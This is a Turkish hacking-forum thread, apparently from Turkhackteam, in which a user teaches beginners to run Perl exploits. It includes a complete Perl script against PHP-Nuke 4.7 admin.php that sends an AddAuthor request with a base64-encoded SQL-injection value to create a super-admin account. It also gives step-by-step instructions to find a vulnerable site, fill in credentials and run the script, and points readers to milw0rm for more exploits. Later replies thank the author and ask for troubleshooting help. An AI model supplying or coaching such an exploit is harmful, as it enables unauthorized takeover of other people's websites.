Perl Exploit Kullanımı

NightWolf

Emektar
27 Ara 2005
722
10
about:home
Şimdi efendim lafa başlamadan önce şurdan bi güzel "active perl" indirin download:
http://aspn.activestate.com/ASPN/Downloads/ActivePerl/
Sonra Bunu kurduğunuzda şu dizine kaydedilcek
c:/perl
Şimdi Perl Exploti nasıl kullanılır.Bu Exploit nedir diye kafanızda 2 tane soru olması lazım 1-Exploit nedir 2-Neden kullanılır : F
1-Exploit,denilen bu şey kodlardan ibaret perl ve c dili ile yazılmış kodlardır.Kendileri sistem açıklarını kullanılırlar ( PHP-nuke,phpbb,Iss vs...) gibi birçok açıkları kullanarak sanki harbi hack yapıyormuş hissi uyandırır İşte burda can alıcı 1 nokta var.C dili ile yazılmış exploitler yani".c" ile bitenler windows sistemlerde çalışamaz onlar için shell denilen bir kontrol paneli lazımdır kendiside unix işletim sisteminde mevcuttur.Ama para ile internetten shell hesabı açabilirsinizki tavsiye etmem[gidin 5 milyon verin mandrake linux dergisi alın yanında linux hediye ".pl" uzantılı yani perl dili ile yazılmış exploitler ise anlatacağım....

2-Peki neden kullanılır?

Nasıl Kullanılır.
"Başlat>Çalıştır>Cmd"kadar gelin ve işte karşınızda Komut sistemi şimdi çıkan ekrana

cd .. entera basın sonra tekrardan
cd .. [taki ekranda "c://" yazısını görene kadar cd .. yapın]
Sonra çıkan ekrana
cd perl [enterlayın]
cd bin [enterlayın]
evet Karşınızda şuan

c://perl/bin yazması lazım:

Evet şimdi bir örnek üzerinde gösterelim

Kod:
[LEFT][B]#Code begin [/B]
[B]#!/usr/bin/perl [/B][/LEFT]
 
[LEFT][B]use LWP::UserAgent; [/B][/LEFT]
 
[LEFT][B]if (@ARGV != 1) [/B]
[B]{ [/B]
[B]print "usage: $0 [path_to_admin.php] [/B]
[B]"; [/B]
[B]exit; [/B]
[B]} [/B][/LEFT]
 
[LEFT][B]$path = $ARGV[0]; [/B][/LEFT]
 
[LEFT][B]$php_nuke = LWP::UserAgent->new() or die; [/B]
[B]$php_nuke->post( [/B]
[B]"$path", [/B]
[B]{ [/B]
[B]"add_aid" => "login isminiz", ### login [/B]
[B]"add_name" => "login isminiz", ### name [/B]
[B]"add_pwd" => "şifreniz", ### password [/B]
[B]"add_email" => "[email protected]", ### mail [/B]
[B]"admin" => "eCcgVU5JT04gU0VMRUNUIDEvKjox", ### [/B]
[B]"add_radminsuper" => "1", ### [/B]
[B]"op" => "AddAuthor" ### [/B]
[B]} [/B]
[B]); [/B][/LEFT]
 
[LEFT][B]print "DONE! [/B]
[B]Now go to $path and login as ADMIN"; [/B]
[B]exit; [/B]
[B]#Code end [/B][/LEFT]

Bu Kodu "c://perl/bin" dizinin içine "x.pl" olarak kaydedin yada "ex.pl" önemli deil maksat ".pl" uzantılı olsun.Şimdi bu kod "phpNuke 4.7" açığıdır.Şimdi 4.7 olan bir php-nuke sitesi bulun sonra bu kodun için "login isminiz" gibi yerler var oraları doldurun sonrada:
Çalıştırmak için C:/Perl/phpnuke.pl http://site.com/admin.php yazın ve enter
Eğer çalışmıyorsa patchlenmiştir.

www.milw0rm.com dan başka exploitelerde bulabilirsinizi. kolay gelsin
 
3 Eki 2007
188
1
saol kardeş yani başlayanlar için walla ha güzel anlatmıisın
ben bile böyle anlatamazdım ;)
ellerine sağlık
 

CaDaBRa

Kıdemli Üye
16 Ara 2012
2,139
0
malatya
Night wolf abi şu exploit i buluyorum indiriyorum ama perl de çalıştırınca hep hata alıyorum sebebi nedir acaba.? windows 7 kullanıyorum.
 

NightWolf

Emektar
27 Ara 2005
722
10
about:home
Ne gibi bir hata ekran görüntüsünü koy bi bakayım ;) ve örnekte gösterdiğim ecploiti kullanmıyorsun demi o 2006'da kullanılan bi exploitti :)
 
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.